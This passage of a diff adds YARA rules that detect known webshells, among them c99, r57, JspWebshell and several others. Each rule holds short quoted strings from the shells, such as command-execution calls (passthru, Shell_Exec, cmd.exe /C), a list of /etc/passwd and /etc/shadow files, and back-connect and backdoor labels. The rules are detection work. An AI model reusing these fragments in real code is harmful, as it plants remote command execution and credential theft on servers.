+		$s0 = "action=mysqlread&mass=loadmass\">load all defaults"
+		$s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru"
+		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = "
+	condition:
+		1 of them
+}
+rule Worse_Linux_Shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file Worse Linux Shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+	strings:
+		$s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td"
+		$s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd"
+	condition:
+		1 of them
+}
+rule cyberlords_sql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file cyberlords_sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "03b06b4183cb9947ccda2c3d636406d4"
+	strings:
+		$s0 = "Coded by n0 [nZer0]"
+		$s1 = " www.cyberlords.net"
+		$s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"
+		$s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"
+	condition:
+		1 of them
+}
+rule cmd_asp_5_1_asp {
+	meta:
+		description = "Semi-Auto-generated  - file cmd-asp-5.1.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+	strings:
+		$s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
+		$s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+	condition:
+		1 of them
+}
+rule pws_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file pws.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ecdc6c20f62f99fa265ec9257b7bf2ce"
+	strings:
+		$s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
+		$s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
+		$s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"
+	condition:
+		2 of them
+}
+rule PHP_Shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file PHP Shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+	strings:
+		$s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+		$s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+	condition:
+		all of them
+}
+rule Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html {
+	meta:
+		description = "Semi-Auto-generated  - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8a8c8bb153bd1ee097559041f2e5cf0a"
+	strings:
+		$s0 = "Ayyildiz"
+		$s1 = "TouCh By iJOo"
+		$s2 = "First we check if there has been asked for a working directory"
+		$s3 = "http://ayyildiz.org/images/whosonline2.gif"
+	condition:
+		2 of them
+}
+rule EFSO_2_asp {
+	meta:
+		description = "Semi-Auto-generated  - file EFSO_2.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b5fde9682fd63415ae211d53c6bfaa4d"
+	strings:
+		$s0 = "Ejder was HERE"
+		$s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~"
+	condition:
+		2 of them
+}
+rule lamashell_php {
+	meta:
+		description = "Semi-Auto-generated  - file lamashell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "de9abc2e38420cad729648e93dfc6687"
+	strings:
+		$s0 = "lama's'hell" fullword
+		$s1 = "if($_POST['king'] == \"\") {"
+		$s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"
+	condition:
+		1 of them
+}
+rule Ajax_PHP_Command_Shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file Ajax_PHP Command Shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "93d1a2e13a3368a2472043bd6331afe9"
+	strings:
+		$s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"
+		$s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"
+		$s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct"
+	condition:
+		1 of them
+}
+rule JspWebshell_1_2_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file JspWebshell 1.2.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "70a0ee2624e5bbe5525ccadc467519f6"
+	strings:
+		$s0 = "JspWebshell"
+		$s1 = "CreateAndDeleteFolder is error:"
+		$s2 = "<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryHashtable(\"java.c"
+		$s3 = "String _password =\"111\";"
+	condition:
+		2 of them
+}
+rule Sincap_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Sincap.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b68b90ff6012a103e57d141ed38a7ee9"
+	strings:
+		$s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');"
+		$s2 = "$tampon4=$tampon3-1"
+		$s3 = "@aventgrup.net"
+	condition:
+		2 of them
+}
+rule Test_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file Test.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "77e331abd03b6915c6c6c7fe999fcb50"
+	strings:
+		$s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword
+		$s2 = "fwrite ($fp, \"$yazi\");" fullword
+		$s3 = "$entry_line=\"HACKed by EntriKa\";" fullword
+	condition:
+		1 of them
+}
+rule Phyton_Shell_py {
+	meta:
+		description = "Semi-Auto-generated  - file Phyton Shell.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "92b3c897090867c65cc169ab037a0f55"
+	strings:
+		$s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword
+		$s2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword
+		$s3 = "print \"error; help: head -n 16 d00r.py\"" fullword
+		$s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword
+	condition:
+		1 of them
+}
+rule mysql_tool_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file mysql_tool.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5fbe4d8edeb2769eda5f4add9bab901e"
+	strings:
+		$s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"
+		$s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"
+		$s4 = "<div align=\"center\">The backup process has now started<br "
+	condition:
+		1 of them
+}
+rule Zehir_4_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Zehir 4.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "7f4e12e159360743ec016273c3b9108c"
+	strings:
+		$s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="
+		$s4 = "<input type=submit value=\"Test Et!\" onclick=\""
+	condition:
+		1 of them
+}
+rule sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "330af9337ae51d0bac175ba7076d6299"
+	strings:
+		$s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"
+		$s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"
+	condition:
+		1 of them
+}
+rule phpbackdoor15_php {
+	meta:
+		description = "Semi-Auto-generated  - file phpbackdoor15.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0fdb401a49fc2e481e3dfd697078334b"
+	strings:
+		$s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"
+		$s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"
+		$s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"
+	condition:
+		1 of them
+}
+rule phpjackal_php {
+	meta:
+		description = "Semi-Auto-generated  - file phpjackal.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "ab230817bcc99acb9bdc0ec6d264d76f"
+	strings:
+		$s3 = "$dl=$_REQUEST['downloaD'];"
+		$s4 = "else shelL(\"perl.exe $name $port\");"
+	condition:
+		1 of them
+}
+rule sql_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8334249cbb969f2d33d678fec2b680c5"
+	strings:
+		$s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#"
+		$s2 = "http://rst.void.ru"
+		$s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+	condition:
+		1 of them
+}
+rule cgi_python_py {
+	meta:
+		description = "Semi-Auto-generated  - file cgi-python.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "0a15f473e2232b89dae1075e1afdac97"
+	strings:
+		$s0 = "a CGI by Fuzzyman"
+		$s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + "
+		$s2 = "values = map(lambda x: x.value, theform[field])     # allows for"
+	condition:
+		1 of them
+}
+rule ru24_post_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file ru24_post_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5b334d494564393f419af745dc1eeec7"
+	strings:
+		$s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword
+		$s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+		$s4 = "Writed by DreAmeRz" fullword
+	condition:
+		1 of them
+}
+rule DTool_Pro_php {
+	meta:
+		description = "Semi-Auto-generated  - file DTool Pro.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "366ad973a3f327dfbfb915b0faaea5a6"
+	strings:
+		$s0 = "r3v3ng4ns\\nDigite"
+		$s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"
+		$s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"
+	condition:
+		1 of them
+}
+rule telnetd_pl {
+	meta:
+		description = "Semi-Auto-generated  - file telnetd.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "5f61136afd17eb025109304bd8d6d414"
+	strings:
+		$s0 = "0ldW0lf" fullword
+		$s1 = "However you are lucky :P"
+		$s2 = "I'm FuCKeD"
+		$s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"
+		$s4 = "atrix@irc.brasnet.org"
+	condition:
+		1 of them
+}
+rule php_include_w_shell_php {
+	meta:
+		description = "Semi-Auto-generated  - file php-include-w-shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "4e913f159e33867be729631a7ca46850"
+	strings:
+		$s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd"
+		$s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB"
+	condition:
+		1 of them
+}
+rule Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php {
+	meta:
+		description = "Semi-Auto-generated  - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "6163b30600f1e80d2bb5afaa753490b6"
+	strings:
+		$s0 = "Safe0ver" fullword
+		$s1 = "Script Gecisi Tamamlayamadi!"
+		$s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%"
+	condition:
+		1 of them
+}
+rule shell_php_php {
+	meta:
+		description = "Semi-Auto-generated  - file shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "1a95f0163b6dea771da1694de13a3d8d"
+	strings:
+		$s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword
+		$s2 = "$tmpfile = tempnam('/tmp', 'phpshell');" 
+		$s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
+	condition:
+		1 of them
+}
+rule telnet_cgi {
+	meta:
+		description = "Semi-Auto-generated  - file telnet.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "dee697481383052980c20c48de1598d1"
+	strings:
+		$s0 = "www.rohitab.com"
+		$s1 = "W A R N I N G: Private Server"
+		$s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie"
+		$s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C"
+	condition:
+		1 of them
+}
+rule ironshell_php {
+	meta:
+		description = "Semi-Auto-generated  - file ironshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+	strings:
+		$s0 = "www.ironwarez.info"
+		$s1 = "$cookiename = \"wieeeee\";"
+		$s2 = "~ Shell I"
+		$s3 = "www.rootshell-team.info"
+		$s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"
+	condition:
+		1 of them
+}
+rule backdoorfr_php {
+	meta:
+		description = "Semi-Auto-generated  - file backdoorfr.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "91e4afc7444ed258640e85bcaf0fecfc"
+	strings:
+		$s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan"
+		$s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc"
+	condition:
+		1 of them
+}
+rule aspydrv_asp {
+	meta:
+		description = "Semi-Auto-generated  - file aspydrv.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "1c01f8a88baee39aa1cebec644bbcb99"
+		score = 60
+	strings:
+		$s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))"
+		$s1 = "password"
+		$s2 = "session(\"shagman\")="
+	condition:
+		2 of them
+}
+rule cmdjsp_jsp {
+	meta:
+		description = "Semi-Auto-generated  - file cmdjsp.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b815611cc39f17f05a73444d699341d4"
+	strings:
+		$s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
+		$s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+		$s2 = "cmdjsp.jsp" 
+		$s3 = "michaeldaw.org" fullword
+	condition:
+		1 of them
+}
+rule h4ntu_shell__powered_by_tsoi_ {
+	meta:
+		description = "Semi-Auto-generated  - file h4ntu shell [powered by tsoi].txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+	strings:
+		$s0 = "h4ntu shell"
+		$s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
+	condition:
+		1 of them
+}
+rule Ajan_asp {
+	meta:
+		description = "Semi-Auto-generated  - file Ajan.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "b6f468252407efc2318639da22b08af0"
+	strings:
+		$s1 = "c:\\downloaded.zip"
+		$s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
+		$s3 = "http://www35.websamba.com/cybervurgun/"
+	condition:
+		1 of them
+}
+rule PHANTASMA_php {
+	meta:
+		description = "Semi-Auto-generated  - file PHANTASMA.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "52779a27fa377ae404761a7ce76a5da7"
+	strings:
+		$s0 = ">[*] Safemode Mode Run</DIV>"
+		$s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"
+		$s2 = "[*] Spawning Shell"
+		$s3 = "Cha0s"
+	condition:
+		2 of them
+}
+rule MySQL_Web_Interface_Version_0_8_php {
+	meta:
+		description = "Semi-Auto-generated  - file MySQL Web Interface Version 0.8.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "36d4f34d0a22080f47bb1cb94107c60f"
+	strings:
+		$s0 = "SooMin Kim"
+		$s1 = "http://popeye.snu.ac.kr/~smkim/mysql"
+		$s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"
+		$s3 = "<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi"
+	condition:
+		2 of them
+}
+rule simple_cmd_html {
+	meta:
+		description = "Semi-Auto-generated  - file simple_cmd.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		hash = "c6381412df74dbf3bcd5a2b31522b544"
+	strings:
+		$s1 = "<title>G-Security Webshell</title>" fullword
+		$s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+		$s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+		$s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+	condition:
+		all of them
+}
+rule _1_c2007_php_php_c100_php {
+	meta:
+		description = "Semi-Auto-generated  - from files 1.txt, c2007.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash1 = "d089e7168373a0634e1ac18c0ee00085"
+		hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"
+	strings:
+		$s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""
+		$s3 = "echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+	condition:
+		1 of them
+}
+rule _nst_php_php_img_php_php_nstview_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+		hash1 = "17a07bb84e137b8aa60f87cd6bfab748"
+		hash2 = "4745d510fed4378e4b1730f56f25e569"
+	strings:
+		$s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i"
+		$s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v"
+		$s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input"
+	condition:
+		1 of them
+}
+rule _network_php_php_xinfo_php_php_nfm_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "acdbba993a5a4186fd864c5e4ea0ba4f"
+		hash1 = "2601b6fc1579f263d2f3960ce775df70"
+		hash2 = "401fbae5f10283051c39e640b77e4c26"
+	strings:
+		$s0 = ".textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa"
+		$s2 = "<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''"
+	condition:
+		all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s2 = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft"
+		$s3 = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r"
+	condition:
+		1 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash3 = "8023394542cddf8aee5dec6072ed02b5"
+		hash4 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash5 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"
+		$s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"
+	condition:
+		1 of them
+}
+rule _c99shell_v1_0_php_php_c99php_SsEs_php_php_ctt_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash3 = "671cad517edd254352fe7e0c7c981c39"
+	strings:
+		$s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""
+		$s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""
+		$s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""
+	condition:
+		2 of them
+}
+rule _r577_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash2 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s2 = "echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_POST['"
+		$s3 = "echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db>"
+	condition:
+		1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php_ctt_sh_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "09609851caa129e40b0d56e90dfc476c"
+		hash6 = "671cad517edd254352fe7e0c7c981c39"
+	strings:
+		$s0 = "  if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\""
+		$s1 = "  if (file_exists($mkfile)) {echo \"<b>Make File \\\"\".htmlspecialchars($mkfile"
+		$s2 = "  echo \"<center><b>MySQL \".mysql_get_server_info().\" (proto v.\".mysql_get_pr"
+		$s3 = "  elseif (!fopen($mkfile,\"w\")) {echo \"<b>Make File \\\"\".htmlspecialchars($m"
+	condition:
+		all of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
+		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		hash5 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "$sess_data[\"cut\"] = array(); c99_s"
+		$s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))"
+	condition:
+		1 of them
+}
+rule _w_php_php_wacking_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash2 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "\"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
+		$s2 = "c99sh_sqlquery"
+	condition:
+		1 of them
+}
+rule _w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
+		hash1 = "3ca5886cd54d495dc95793579611f59a"
+		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
+		hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		hash4 = "09609851caa129e40b0d56e90dfc476c"
+	strings:
+		$s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA"
+		$s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec"
+	condition:
+		1 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_spy_php_php_s_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
+		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
+		hash1 = "911195a9b7c010f61b66439d9048f400"
+		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
+		hash3 = "eed14de3907c9aa2550d95550d1a2d5f"
+		hash4 = "817671e1bdc85e04cc3440bbd9288800"
+	strings:
+		$s0 = "echo sr(15,\"<b>\".$lang[$language.'_text"
+		$s1 = ".$arrow.\"</b>\",in('text','"
+	condition:
+		2 of them
+}
+rule _r577_php_php_SnIpEr_SA_Shell_php_r57_php_php {
+	meta:
+		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		super_rule = 1
